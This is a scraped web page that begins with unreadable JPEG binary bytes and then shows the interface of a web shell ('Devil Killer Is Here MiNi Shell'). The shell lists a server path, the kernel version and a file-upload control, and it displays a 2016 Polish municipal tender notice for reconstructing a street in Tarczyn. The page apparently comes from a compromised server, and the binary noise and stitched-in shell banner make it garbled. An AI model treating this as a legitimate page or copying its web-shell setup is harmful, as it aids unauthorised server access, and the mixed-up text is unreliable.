JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160830/303640-N-2016.html

      <div class="divRow_xforms">
         <div>Ogłoszenie nr 303640 - 2016
              z dnia 2016-08-30 r.</div>
         <div style="text-align: center" class="headerMedium_xforms">
            Tarczyn: Przebudowa ul. Gawarskiego w Tarczynie.
            <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
         </div>
         <div>
            <b>Zamieszczanie ogłoszenia:</b>
            obowiązkowe
         </div>
         <div>
            <b>Ogłoszenie dotyczy:</b>
            zamówienia publicznego
         </div>
         <div>
            <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            <b>Nazwa projektu lub programu</b>
            <br />
         </div>
         <div>
            <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA I: ZAMAWIAJĄCY</u>
         </div>
         <div style="padding-left: 20px">
            <b>Postępowanie przeprowadza centralny zamawiający</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b>
            <br />
            <b>Informacje dodatkowe:</b>
            <br />
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>I. 1) NAZWA I ADRES:</b>
               Gmina Tarczyn, krajowy numer identyfikacyjny
              55051600000, ul.
              ul. Juliana Stępkowskiego 
              17,
              05555  
              Tarczyn, woj.
              mazowieckie, państwo
              , tel.
              22 7157900, 7157938, e-mail
              zamowienia.publiczne@tarczyn.pl, faks
              227 278 191.
               <br />
               Adres strony internetowej (URL): www.bip.tarczyn.pl
               <br />
               Adres profilu nabywcy:

                www.bip.tarczyn.pl
               <br />
            </div>
            <div style="text-align: left">
               <b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>
               Administracja samorządowa
            </div>
            <div style="text-align: left">
               <b>
                  I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA
                  <i>(jeżeli dotyczy)</i>
                  :
               </b>
               <div style="padding-left: 20px">
                  Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                  <br />
               </div>
            </div>
            <div style="text-align: left">
               <b>I.4) KOMUNIKACJA:</b>
               <br />
               <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b>
               <div style="padding-left: 20px">
                  tak
                  <br />
                  www.bip.tarczyn.pl   Zakładka: Zamówienia publiczne 2016
               </div>
               <br />
               <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia</b>
               <div style="padding-left: 20px">
                  tak
                  <br />
                  www.bip.tarczyn.pl    Zakładka: Zamówienia publiczne 2016
               </div>
               <br />
               <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
               </div>
               <br />
               <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b>
               <br />
               <b>Elektronicznie</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  adres
                  <br />
               </div>
               <br />
               <div style="padding-left: 20px">
                  <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  nie
                  <br />
                  <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  tak
                  <br />
                  Inny sposób:
                  <br />
                  Pisemnie, za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca.
                  <br />
                  Adres:
                  <br />
                  Urząd Miejski w Tarczynie, ul. J. Stępkowskiego 17, 05-555 Tarczyn, pokój nr 3 na parterze (Punkt Obsługi Interesantów)
               </div>
               <br />
               <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                  <br />
               </div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA II: PRZEDMIOT ZAMÓWIENIA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <br />
               <b>II.1) Nazwa nadana zamówieniu przez zamawiającego:</b>
               Przebudowa ul. Gawarskiego w Tarczynie.
               <br />
               <b>Numer referencyjny:</b>
               PI.271.12.2016.MBO
               <br />
               <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b>
               <br />
               <div style="padding-left: 20px; text-align: justify">nie</div>
               <br />
               <b>II.2) Rodzaj zamówienia:</b>
               roboty budowlane
               <br />
               <b>II.3) Informacja o możliwości składania ofert częściowych</b>
               <br />
               Zamówienie podzielone jest na części:
               <br />
               <div style="padding-left: 20px">Nie</div>
               <br />
               <br />
               <b>II.4) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               Przedmiotem zamówienia jest wykonanie przez Wykonawcę na rzecz Zamawiającego przebudowy ul. Gawarskiego w Tarczynie wraz z przebudową infrastruktury teletechnicznej kolidującej z nowym układem drogowym oraz budową oświetlenia ulicznego.
    Szczegółowy zakres robót zawierają:
    przedmiar robót cz. drogowa załącznik nr 7 do siwz,
    dokumentacja projektowa cz. drogowa  załącznik nr 8 do siwz,
    specyfikacja techniczna wykonania i odbioru robót cz. drogowa załącznik nr 9 do siwz,
    przedmiar robót cz. elektryczna załącznik nr 10 do siwz,
    dokumentacja projektowa cz. elektryczna załącznik nr 11 do siwz,
    specyfikacja techniczna wykonania i odbioru robót cz. elektryczna załącznik nr 12 do siwz,
    przedmiar robót cz. teletechniczna- załącznik nr 13 do siwz,
    dokumentacja projektowa cz. teletechniczna- załącznik nr 14 do siwz,
    specyfikacja techniczna wykonania i odbioru robót cz. teletechniczna- załącznik nr 15 do siwz.
    projekt stałej organizacji ruchu w ul. Gawarskiego- załącznik nr 16 do siwz.
               <br />
               <br />
               <b>II.5) Główny kod CPV:</b>
               45233140-2
               <br />
               <b>Dodatkowe kody CPV:</b>
               31527200-8
               <br />
               <b>II.6) Całkowita wartość zamówienia</b>
               <i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>
               :
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i>
               </div>
               <br />
               <b>II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:</b>
               tak
               <br />
               Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający  przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 Pzp.  Zamawiający przewiduje udzielenie zamówień do 10% wartości zamówienia podstawowego. Zamówienia te zostaną udzielone w razie konieczności pod warunkiem zapewnienia odpowiednich środków w budżecie Zamawiającego i będą polegały na powtórzeniu podobnych robót budowlanych.
               <br />
               <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b>
               <div style="padding-left: 20px">
                  data zakończenia: 30/12/2016
                  <br />
               </div>
               <br />
               <b>II.9) Informacje dodatkowe:</b>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b>
                  <br />
                  Określenie warunków:
                
    nie dotyczy
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.2)  Sytuacja finansowa lub ekonomiczna</b>
                  <br />
                  Określenie warunków:
                
    Zamawiający nie precyzuje tego warunku
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.3) Zdolność techniczna lub zawodowa</b>
                  <br />
                  Określenie warunków:
                
     Wykonawca musi legitymować się należytym wykonaniem zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy  w tym okresie):
    a) co najmniej 2 robót,  polegających na wykonaniu nawierzchni asfaltowej (droga, chodnik, parking, plac itp.)  o powierzchni co najmniej 3 000m2- osobno każda z robót,
    b) co najmniej 2 robót, polegających na wykonaniu nawierzchni z kostki brukowej o powierzchni min. 1 000 m2 - osobno każda z robót,
    c) co najmniej 2 robót polegających na wykonaniu oświetlenia ulicznego (oświetlenia dróg, placów, parkingów itp.) o wartości min. 50 000,00 zł brutto- osobno każda z robót,
    d) co najmniej 2 robót polegających na budowie / przebudowie / modernizacji / remoncie infrastruktury teletechnicznej o długości min. 300 m  każda z robót.
    Zamawiający uzna za spełniające warunek udziału w postępowaniu roboty zawierające wszystkie opisane wyżej elementy.

     Wykonawca ma wykazać, że dysponuje co najmniej jedną osobą posiadającą uprawnienia do pełnienia funkcji kierownika budowy w specjalności drogowej, co najmniej jedną osobą posiadającą uprawnienia do pełnienia funkcji kierownika budowy lub kierownika robót w specjalności elektrycznej oraz co najmniej jedną osobą posiadającą uprawnienia do pełnienia funkcji kierownika budowy lub kierownika robót w specjalności instalacyjnej w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą.
                  <br />
                  Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                  <br />
                  Informacje dodatkowe:
               </div>
               <b>III.2) PODSTAWY WYKLUCZENIA</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b>
                  <br />
                  <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                  <br />
               </div>
               <b>III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI</b>
               <br />
               <div style="padding-left: 20px">
                  <b>Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu</b>
                  <br />
                  nie
                  <br />
                  <b>Oświadczenie o spełnianiu kryteriów selekcji</b>
                  <br />
                  nie
               </div>
               <b>III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:</b>
               <br />
               <div style="padding-left: 20px">a) oświadczenie o braku podstaw do wykluczenia  załącznik nr 2 do siwz;
    b) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 Pzp  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
    c) Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</div>
               <b>III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b>
                  <br />
                  a) wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane wraz z załączeniem dowodów określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone  załącznik nr 4 do siwz;
Dowodami, o których mowa powyżej są:
 referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane,
 inne dokumenty  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku gdy Gmina Tarczyn jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
Zamawiający wymaga przedstawienia w wykazie najważniejszych zamówień, spełniających wymogi, określone w pkt. 3.1.2 siwz. Wykonawca ma przedłożyć dowody o których mowa powyżej w odniesieniu do wykonanych zamówień wskazanych w wykazie.
b) oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych w związku z pkt. 3.1 siwz  załącznik numer 2 do siwz;
c) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami  załącznik nr 5 do siwz.
                  <br />
                  <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b>
                  <br />
               </div>
               <b>III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px" />
               <b>III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)</b>
               <div style="padding-left: 20px">1) wypełniony formularz oferty  załącznik nr 1 do siwz,
    2) informację o podmiocie wspólnym  załącznik nr 3 do siwz  jeśli dotyczy,
    3) pełnomocnictwo do podpisania oferty  jeśli dotyczy, (oryginał dokumentu lub kopia pełnomocnictwa poświadczona notarialnie)
    4) informację, czy wybór oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, zawierającą nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania oraz wskazując ich wartość bez kwoty podatku (art. 91 ust. 3a Pzp)- jeśli dotyczy.</div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA IV: PROCEDURA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>IV.1) OPIS</b>
               <br />
               <b>IV.1.1) Tryb udzielenia zamówienia:</b>
               przetarg nieograniczony
               <br />
               <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b>
               <div style="padding-left: 20px">nie</div>
               <br />
               <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b>
               <div style="padding-left: 20px">nie</div>
               <br />
               <b>IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
               </div>
               <br />
               <b>IV.1.5.) Wymaga się złożenia oferty wariantowej:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie oferty wariantowej
                  <br />
                  nie
                  <br />
                  Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</b>
               <br />
               <i>(przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)</i>
               <div style="padding-left: 20px">
                  Liczba wykonawców  
                  <br />
                  Przewidywana minimalna liczba wykonawców
                  <br />
                  Maksymalna liczba wykonawców  
                  <br />
                  Kryteria selekcji wykonawców:
                  <br />
               </div>
               <br />
               <b>IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:</b>
               <div style="padding-left: 20px">
                  Umowa ramowa będzie zawarta:
                  <br />
                  <br />
                  Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.8) Aukcja elektroniczna</b>
               <br />
               <b>Przewidziane jest przeprowadzenie aukcji elektronicznej</b>
               <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem)</i>
               nie
               <br />
               <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej:</b>
               <br />
               <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b>
               <br />
               nie
               <br />
               Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
               <br />
               Informacje dotyczące przebiegu aukcji elektronicznej:
               <br />
               Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień):
               <br />
               Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
               <br />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej:
               <br />
               Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                  <br />
                  Warunki zamknięcia aukcji elektronicznej:
                  <br />
               </div>
               <br />
               <b>IV.2) KRYTERIA OCENY OFERT</b>
               <br />
               <b>IV.2.1) Kryteria oceny ofert:</b>
               <br />
               <b>IV.2.2) Kryteria</b>
               <br />
               <div style="padding-left: 20px">
                  <table>
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td>Cena</td>
                        <td>60</td>
                     </tr>
                  </table>
               </div>
               <br />
               <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp</b>
               (przetarg nieograniczony)
               <br />
               nie
               <br />
               <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne</b>
               <br />
               <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b>
               <br />
               Minimalne wymagania, które muszą spełniać wszystkie oferty:
               <br />
               <br />
               Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
               <br />
               Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
               <br />
               Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
               <br />
               <br />
               Informacje dodatkowe
               <br />
               <br />
               <br />
               <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b>
               <br />
               Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
               <br />
               <br />
               Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
               <br />
               <br />
               Wstępny harmonogram postępowania:
               <br />
               <br />
               Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
               <br />
               Należy podać informacje na temat etapów dialogu:
               <br />
               <br />
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b>
               <br />
